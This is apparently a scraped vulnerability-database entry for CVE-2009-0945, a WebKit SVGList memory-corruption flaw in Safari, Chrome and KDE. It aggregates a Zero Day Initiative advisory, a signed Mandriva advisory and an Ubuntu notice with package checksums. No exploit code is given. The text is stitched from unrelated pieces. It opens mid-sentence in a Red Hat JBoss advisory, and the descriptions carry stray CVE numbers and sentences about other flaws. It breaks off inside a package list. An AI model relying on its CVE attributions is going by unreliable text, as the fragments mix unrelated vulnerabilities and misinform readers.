original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as
the original reporter of CVE-2016-0705.
See the corresponding CVE pages linked to in the References section for
more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must
log in to download the update). Before applying the update, back up your
existing Red Hat JBoss Web Server installation (including all applications
and configuration files).
After installing the updated packages, the httpd daemon will be restarted
automatically. JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]
JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
6 |
|
var-200905-0505
|
Array index error in the insertItemBefore method in WebKit, as used in Apple Safari before 3.2.3 and 4 Public Beta, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Google Chrome Stable before 1.0.154.65, and possibly other products allows remote attackers to execute arbitrary code via a document with a SVGPathList data structure containing a negative index in the (1) SVGTransformList, (2) SVGStringList, (3) SVGNumberList, (4) SVGPathSegList, (5) SVGPointList, or (6) SVGLengthList SVGList object, which triggers memory corruption. WebKit of insertItemBefore Methods include SVGPathList A vulnerability exists in the execution of arbitrary code due to flaws in the processing of documents with data structures.A third party may execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.The specific flaw exists during the parsing of malformed SVGLists via the SVGPathList data structure, the following lists are affected: SVGTransformList, SVGStringList, SVGNumberList, SVGPathSegList, SVGPointList, SVGLengthList. When a negative index argument is suppled to the insertItemBefore() method, a memory corruption occurs resulting in the ability to execute arbitrary code. WebKit is prone to a remote memory-corruption vulnerability. Failed exploit attempts will result in a denial-of-service condition.
The issue also affects the following:
Apple Safari prior to 3.2.3
Apple Mac OS X v10.5 through v10.5.6,
Apple Mac OS X Server v10.5 through v10.5.6
Google Chrome prior to 1.0.154.65. Safari is the web browser bundled by default in the Apple operating system. There is a memory corruption vulnerability in the processing of SVGList objects in WebKit in Safari. Safari has multiple input validation errors in its handling of the feed: URL, and accessing a malicious feed: URL can lead to arbitrary JavaScript execution. NOTE: the
JBIG2Stream.cxx vector may overlap CVE-2009-1179. (CVE-2009-0791). (CVE-2009-1709).
This update provides a solution to this vulnerability.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:027
http://www.mandriva.com/security/
_______________________________________________________________________
Package : kdelibs4
Date : January 27, 2010
Affected: 2009.1
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities was discovered and corrected in kdelibs4:
KDE KSSL in kdelibs 3.5.4, 4.2.4, and 4.3 does not properly handle a
\'\0\' (NUL) character in a domain name in the Subject Alternative
Name field of an X.509 certificate, which allows man-in-the-middle
attackers to spoof arbitrary SSL servers via a crafted certificate
issued by a legitimate Certification Authority, a related issue to
CVE-2009-2408 (CVE-2009-2702). (CVE-2009-1687). (CVE-2009-1690).
KDE Konqueror allows remote attackers to cause a denial of service
(memory consumption) via a large integer value for the length property
of a Select object, a related issue to CVE-2009-1692 (CVE-2009-2537).
The gdtoa (aka new dtoa) implementation in gdtoa/misc.c in
libc in FreeBSD 6.4 and 7.2, NetBSD 5.0, and OpenBSD 4.5 allows
context-dependent attackers to cause a denial of service (application
crash) or possibly have unspecified other impact via a large precision
value in the format argument to a printf function, related to an
array overrun. (CVE-2009-0689).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2702
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1687
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1725
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1690
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2537
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0945
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.1:
c08161eacba6cdb1b0ba26babe5f8cc5 2009.1/i586/kdelibs4-core-4.2.4-0.8mdv2009.1.i586.rpm
933468cf4109252dac5119edd958f73d 2009.1/i586/kdelibs4-devel-4.2.4-0.8mdv2009.1.i586.rpm
96703a0ef0baf299647ff27d64cb0680 2009.1/i586/libkde3support4-4.2.4-0.8mdv2009.1.i586.rpm
e5f60ba41e5919fa77c313b204e1f712 2009.1/i586/libkdecore5-4.2.4-0.8mdv2009.1.i586.rpm
cf8af6e467cd1585c44e1cce01362526 2009.1/i586/libkdefakes5-4.2.4-0.8mdv2009.1.i586.rpm
1c9c04b5f6c0c59d2e5860b077e0c6e3 2009.1/i586/libkdesu5-4.2.4-0.8mdv2009.1.i586.rpm
89fe7c33c7e5bcc23595560ae4664bf6 2009.1/i586/libkdeui5-4.2.4-0.8mdv2009.1.i586.rpm
30b73ef58ac3a45ff86756ad09d0d555 2009.1/i586/libkdnssd4-4.2.4-0.8mdv2009.1.i586.rpm
a1f00af00ea7e52d9f187f1fe5ccdfe2 2009.1/i586/libkfile4-4.2.4-0.8mdv2009.1.i586.rpm
553486988b945307ee038cb41dcb76e6 2009.1/i586/libkhtml5-4.2.4-0.8mdv2009.1.i586.rpm
9d9501ff70e709c5ea32b35aa985688a 2009.1/i586/libkimproxy4-4.2.4-0.8mdv2009.1.i586.rpm
a2ec3f440eb6cf545abbc63a3d34c1e5 2009.1/i586/libkio5-4.2.4-0.8mdv2009.1.i586.rpm
4168e955b60a5a69d8f1e085b30d0424 2009.1/i586/libkjs4-4.2.4-0.8mdv2009.1.i586.rpm
bfcece9c73348c6415c48ec266877908 2009.1/i586/libkjsapi4-4.2.4-0.8mdv2009.1.i586.rpm
228ca7dc2a86fdc868a5937b16a7a08c 2009.1/i586/libkjsembed4-4.2.4-0.8mdv2009.1.i586.rpm
f6297ae0630eb6207895df9f2f971eb6 2009.1/i586/libkmediaplayer4-4.2.4-0.8mdv2009.1.i586.rpm
cf6113c17858d5e6e3c0e04622f8a66c 2009.1/i586/libknewstuff2_4-4.2.4-0.8mdv2009.1.i586.rpm
da55a2f428ad020834f7b91c0023ecf6 2009.1/i586/libknotifyconfig4-4.2.4-0.8mdv2009.1.i586.rpm
9fef466138ff78a3d6d3244998a9ba30 2009.1/i586/libkntlm4-4.2.4-0.8mdv2009.1.i586.rpm
4f7c0ad254ec1990f5dab1c0b959629d 2009.1/i586/libkparts4-4.2.4-0.8mdv2009.1.i586.rpm
8c58d6a9a6ec7fc21f287b2f4c2e9858 2009.1/i586/libkpty4-4.2.4-0.8mdv2009.1.i586.rpm
8ed500d050b95560d7eff6db26fa05ee 2009.1/i586/libkrosscore4-4.2.4-0.8mdv2009.1.i586.rpm
2d8d12d8a7bbfe18f6b04b9807795077 2009.1/i586/libkrossui4-4.2.4-0.8mdv2009.1.i586.rpm
8cc5c226e381b122983440b3440c1476 2009.1/i586/libktexteditor4-4.2.4-0.8mdv2009.1.i586.rpm
3c53941130fb8cc6d12b8cdea488f536 2009.1/i586/libkunittest4-4.2.4-0.8mdv2009.1.i586.rpm
3996bfcff0b2465c39c6ccdb8367f401 2009.1/i586/libkutils4-4.2.4-0.8mdv2009.1.i586.rpm
129a26ab20c792994113b5db00b7f7c4 2009.1/i586/libnepomuk4-4.2.4-0.8mdv2009.1.i586.rpm
0b88090e1cba0db59a3fb85c34e6b726 2009.1/i586/libplasma3-4.2.4-0.8mdv2009.1.i586.rpm
79b484a6c8e20db156fbe130c81e2001 2009.1/i586/libsolid4-4.2.4-0.8mdv2009.1.i586.rpm
ddd09e03af15f421b2e38b6f06c0247a 2009.1/i586/libthreadweaver4-4.2.4-0.8mdv2009.1.i586.rpm
fe70dc01416cc986d1e19c15a0b5cfa7 2009.1/SRPMS/kdelibs4-4.2.4-0.8mdv2009.1.src.rpm
Mandriva Linux 2009.1/X86_64:
89f77418ccda86b51c7d32d011e88e9b 2009.1/x86_64/kdelibs4-core-4.2.4-0.8mdv2009.1.x86_64.rpm
d0b009e595350648b12cca1ee094802e 2009.1/x86_64/kdelibs4-devel-4.2.4-0.8mdv2009.1.x86_64.rpm
03db494c356e0b0823ddf697d42c0f50 2009.1/x86_64/lib64kde3support4-4.2.4-0.8mdv2009.1.x86_64.rpm
6d98531ba95a096fd49801f7df452776 2009.1/x86_64/lib64kdecore5-4.2.4-0.8mdv2009.1.x86_64.rpm
bf3845f586eeeaafab5e25442f4d8950 2009.1/x86_64/lib64kdefakes5-4.2.4-0.8mdv2009.1.x86_64.rpm
b9767fb69262886d60a7844ad6569e27 2009.1/x86_64/lib64kdesu5-4.2.4-0.8mdv2009.1.x86_64.rpm
d709c9fb8874c432d1b4e415e9c06858 2009.1/x86_64/lib64kdeui5-4.2.4-0.8mdv2009.1.x86_64.rpm
6d062780a7629eed7e93ab9e66daf633 2009.1/x86_64/lib64kdnssd4-4.2.4-0.8mdv2009.1.x86_64.rpm
f39c44bc7572d06921061c0ac5ef78c9 2009.1/x86_64/lib64kfile4-4.2.4-0.8mdv2009.1.x86_64.rpm
90f8ecd4967830ebff3b81732162fe33 2009.1/x86_64/lib64khtml5-4.2.4-0.8mdv2009.1.x86_64.rpm
005d7de69a0063a8dc396b9dffdf20ed 2009.1/x86_64/lib64kimproxy4-4.2.4-0.8mdv2009.1.x86_64.rpm
3924d83bf43990f7a7ba5d2eea29ef5d 2009.1/x86_64/lib64kio5-4.2.4-0.8mdv2009.1.x86_64.rpm
9124f0ce5f1643e4310ef0bfc5fda970 2009.1/x86_64/lib64kjs4-4.2.4-0.8mdv2009.1.x86_64.rpm
573504d0c305e757b3c163b9132264e4 2009.1/x86_64/lib64kjsapi4-4.2.4-0.8mdv2009.1.x86_64.rpm
917e5b175a3a5480e848dee6201e99d9 2009.1/x86_64/lib64kjsembed4-4.2.4-0.8mdv2009.1.x86_64.rpm
604cce29c11b2452b2744ff72e248b7c 2009.1/x86_64/lib64kmediaplayer4-4.2.4-0.8mdv2009.1.x86_64.rpm
bd75d3e4feaa98a3659ae5d113fe45f6 2009.1/x86_64/lib64knewstuff2_4-4.2.4-0.8mdv2009.1.x86_64.rpm
0a7d48b91c673f5908ce2d47a77746e2 2009.1/x86_64/lib64knotifyconfig4-4.2.4-0.8mdv2009.1.x86_64.rpm
a91967cfec8b470cc7520ac17590d41b 2009.1/x86_64/lib64kntlm4-4.2.4-0.8mdv2009.1.x86_64.rpm
0159bb033c507f20fb8bd77a7a8be43a 2009.1/x86_64/lib64kparts4-4.2.4-0.8mdv2009.1.x86_64.rpm
a062d0124cdea9dfcafb82ed2c5dfd54 2009.1/x86_64/lib64kpty4-4.2.4-0.8mdv2009.1.x86_64.rpm
8c0950479a23531a03836f7744d6b90d 2009.1/x86_64/lib64krosscore4-4.2.4-0.8mdv2009.1.x86_64.rpm
ca61efacf989bd4421d2c88abc440e3f 2009.1/x86_64/lib64krossui4-4.2.4-0.8mdv2009.1.x86_64.rpm
bcd31e87995de0f86ad9c363e87ea0d4 2009.1/x86_64/lib64ktexteditor4-4.2.4-0.8mdv2009.1.x86_64.rpm
23a0f2c640a20dd1be2b4475a9102cd6 2009.1/x86_64/lib64kunittest4-4.2.4-0.8mdv2009.1.x86_64.rpm
e49987a6d8016b6ac39011b6cac0b570 2009.1/x86_64/lib64kutils4-4.2.4-0.8mdv2009.1.x86_64.rpm
90d6806fa9dcd2ac1b71fc3b72dd4f81 2009.1/x86_64/lib64nepomuk4-4.2.4-0.8mdv2009.1.x86_64.rpm
4808080c578223d0bcb156e78f5d661f 2009.1/x86_64/lib64plasma3-4.2.4-0.8mdv2009.1.x86_64.rpm
e8cecb137634dfc738617b67a6d34122 2009.1/x86_64/lib64solid4-4.2.4-0.8mdv2009.1.x86_64.rpm
35c8778eaaa5465a8f15c27a57d8ed60 2009.1/x86_64/lib64threadweaver4-4.2.4-0.8mdv2009.1.x86_64.rpm
fe70dc01416cc986d1e19c15a0b5cfa7 2009.1/SRPMS/kdelibs4-4.2.4-0.8mdv2009.1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFLX/3wmqjQ0CJFipgRApr4AKC7I0w56Y9GFgmZeeNIeUDGaXgxHQCg6N5C
YuntVxGlOXktJ3qUQl1SZ1Y=
=5Avg
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ZDI-09-022: Apple Safari Malformed SVGList Parsing Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-022
May 13, 2009
-- CVE ID:
CVE-2009-0945
-- Affected Vendors:
Apple
-- Affected Products:
Apple Safari
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6960.
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:
http://support.apple.com/kb/HT3549
-- Disclosure Timeline:
2009-03-19 - Vulnerability reported to vendor
2009-05-13 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Nils
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
. (CVE-2009-0945)
Several flaws were discovered in the QtWebKit browser and JavaScript
engines. (CVE-2009-1699, CVE-2009-1713)
It was discovered that QtWebKit did not prevent the loading of local Java
applets. ===========================================================
Ubuntu Security Notice USN-822-1 August 24, 2009
kde4libs, kdelibs vulnerabilities
CVE-2009-0945, CVE-2009-1687, CVE-2009-1690, CVE-2009-1698
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.04 LTS:
kdelibs4c2a 4:3.5.10-0ubuntu1~hardy1.2
Ubuntu 8.10:
kdelibs4c2a 4:3.5.10-0ubuntu6.1
kdelibs5 4:4.1.4-0ubuntu1~intrepid1.2
Ubuntu 9.04:
kdelibs4c2a 4:3.5.10.dfsg.1-1ubuntu8.1
kdelibs5 4:4.2.2-0ubuntu5.1
After a standard system upgrade you need to restart your session to effect
the necessary changes.
Details follow:
It was discovered that KDE-Libs did not properly handle certain malformed
SVG images. This
issue only affected Ubuntu 9.04. (CVE-2009-0945)
It was discovered that the KDE JavaScript garbage collector did not
properly handle memory allocation failures. (CVE-2009-1687)
It was discovered that KDE-Libs did not properly handle HTML content in the
head element. (CVE-2009-1690)
It was discovered that KDE-Libs did not properly handle the Cascading Style
Sheets (CSS) attr function call. (CVE-2009-1698)
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu1~hardy1.2.diff.gz
Size/MD5: 1809719 988ba0b3fcdebaacd489ef624af90d52
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu1~hardy1.2.dsc
Size/MD5: 1729 c2ba26fd1969292837be77339835463e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.orig.tar.gz
Size/MD5: 18631467 5eeb6f132e386668a0395d4d426d495e
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.5.10-0ubuntu1~hardy1.2_all.deb
Size/MD5: 7326386 15016f77751a853d96fbc549bdd0a487
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-doc_3.5.10-0ubuntu1~hardy1.2_all.deb
Size/MD5: 25454764 b8e521c8bfc228667701baad29f9ea0b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu1~hardy1.2_all.deb
Size/MD5: 9322 8a87b3a4fed9f227bb9e2eb0c0cd4829
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_amd64.deb
Size/MD5: 26758194 806e9679c84113d44a6fdcb3827e22b6
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_amd64.deb
Size/MD5: 1381550 739025e9a5f87b174b1b099b8c1f3e4f
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_amd64.deb
Size/MD5: 10654972 04e9b1429bb914d202bfedfc652dab2f
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_i386.deb
Size/MD5: 25990732 a09812c65c6e8d93ed21591cee340396
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_i386.deb
Size/MD5: 1410600 4f6d363ac598ecf83ab910e920cb08b0
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_i386.deb
Size/MD5: 9614618 de2bdf46fa444443af067acdb288d758
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_lpia.deb
Size/MD5: 25971080 5073531043650dac33a01175fd9ba304
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_lpia.deb
Size/MD5: 1375956 fbcbdc659fc44128a4bf37afdc3d466b
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_lpia.deb
Size/MD5: 9642602 904999dc74b11f078c50b9798be80b41
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_powerpc.deb
Size/MD5: 27656762 88ea3f12cee10e81fe212f604697ee87
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_powerpc.deb
Size/MD5: 1393490 7b6d787cba530e950ac4e783693cbce9
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_powerpc.deb
Size/MD5: 10453190 a09dadf79f488712a21d49a829e26c79
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_sparc.deb
Size/MD5: 25026168 a2066fad04e4b92cb4374a10f3ca4912
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_sparc.deb
Size/MD5: 1376552 ca7b84a5ea9c36ca36d51b113335ab70
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_sparc.deb
Size/MD5: 9596082 29426bec2f7943549b046d8aced4172d
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.1.4-0ubuntu1~intrepid1.2.diff.gz
Size/MD5: 94086 bca07843a8dbb43504199cf28f5e5e66
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.1.4-0ubuntu1~intrepid1.2.dsc
Size/MD5: 2308 42bc5a6639b095c402aa1336159b958a
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.1.4.orig.tar.gz
Size/MD5: 11190299 18264580c1d6d978a3049a13fda36f29
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu6.1.diff.gz
Size/MD5: 720448 8dc9da15189485cac9374322825bccbc
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu6.1.dsc
Size/MD5: 2284 e99a996b350144fdf4bef83e6f339ce5
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.orig.tar.gz
Size/MD5: 18631467 5eeb6f132e386668a0395d4d426d495e
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-data_4.1.4-0ubuntu1~intrepid1.2_all.deb
Size/MD5: 3110640 8abefbf8d9f4c168a645761589c2935e
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-doc_4.1.4-0ubuntu1~intrepid1.2_all.deb
Size/MD5: 68582 86eda9548527b86c791c29789ed7fe28
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.5.10-0ubuntu6.1_all.deb
Size/MD5: 7321518 162272e6155b3cd9f3ea08c566b80e5b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-doc_3.5.10-0ubuntu6.1_all.deb
Size/MD5: 25522224 a0ce548bf6862e68285df52ac391c429
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu6.1_all.deb
Size/MD5: 2270 650ab9bbf7f9748a9344495da23a2c82
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 395434 02fdee1fed9ff829a045d3785730d2fd
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 66055728 a8c41d8a9dc4e540a2c7d0c8199799a4
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 1440484 79881c87f9bd56d377790807842c3dcb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_amd64.deb
Size/MD5: 10104606 421e72c07c231a7a68bcbca2c8069062
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_amd64.deb
Size/MD5: 27376386 59c3b6c1110365d63e1da80c363b96da
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_amd64.deb
Size/MD5: 1371456 f25f7f7b7fbc0c99df8ca1f2e734a64c
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_amd64.deb
Size/MD5: 10929852 e55ab2261280a73df4d75b9a0112ec87
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 371576 68138ccb311714315e34a88645c29b33
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 65218012 5fd7fa06fa0d28c98f75c58b3c8130ee
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 1437924 c1df5e2b5b8aa17774b23e651b9a88ee
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_i386.deb
Size/MD5: 9524338 f0a135714a94aefab44f7380a40e967f
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_i386.deb
Size/MD5: 26665042 cf31490fcc88f793c5ea6175b29b4df3
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_i386.deb
Size/MD5: 1404872 d383c99760eb1c92ab22a52bd6f33d4e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_i386.deb
Size/MD5: 10144008 7e596d9e1464e5d016f674fb5d73b869
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 376410 ffc3b92e989c2a301559ebeea2f03d6e
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 65334318 d54fd6082a0ab4c1d324759379674b3d
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 1440518 01b987ef5588a94e82dbffa4f5afd1a1
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_lpia.deb
Size/MD5: 9536660 c3369e8abf325a91ab192e1349c3ecb2
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_lpia.deb
Size/MD5: 26674802 9de5792962f3c0bb21358f44aa000267
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_lpia.deb
Size/MD5: 1368306 b21739dc8c80f55ce0205efcdd2f2e08
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_lpia.deb
Size/MD5: 10141386 ee45606aa19cc8ceaeb73c5d4e6048c5
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 422856 6467cb43fcd16c4d6db7ff5053aaec1b
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 69277942 6820294b0c9505435fbff224c1a4f4f2
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 1445424 99b6afac70dead785c3211a9e92516f6
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_powerpc.deb
Size/MD5: 10239400 be1872cf9859bf46176a2d485584134f
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_powerpc.deb
Size/MD5: 28217616 c2360441a42e8b9d8b91120b38d8ba51
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_powerpc.deb
Size/MD5: 1380892 2841eff5fc2a0a50227ca9a8d34c0a3b
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_powerpc.deb
Size/MD5: 10748632 f6e7de17cd38ee62c1f082a4fb218949
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 381184 1718118e08731a9690a5ce00f0c9f88b
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 64515916 f380c0a0865f4dbaad6b7e2d22d93294
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 1437568 14c1a84e7a518b443b0e851ef41f9ada
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.1.4-0ubuntu1~intrepid1.2_sparc.deb
Size/MD5: 9653946 803926ff9f9cc59a2f728d1aef8affbd
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu6.1_sparc.deb
Size/MD5: 25440578 311423fbaa788d51978e7857010c9242
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu6.1_sparc.deb
Size/MD5: 1368492 d4364357c5450b07aca1aa8981d96290
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu6.1_sparc.deb
Size/MD5: 9800480 4dc89a5d63ce16463a822f16fb82f3d7
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.2.2-0ubuntu5.1.diff.gz
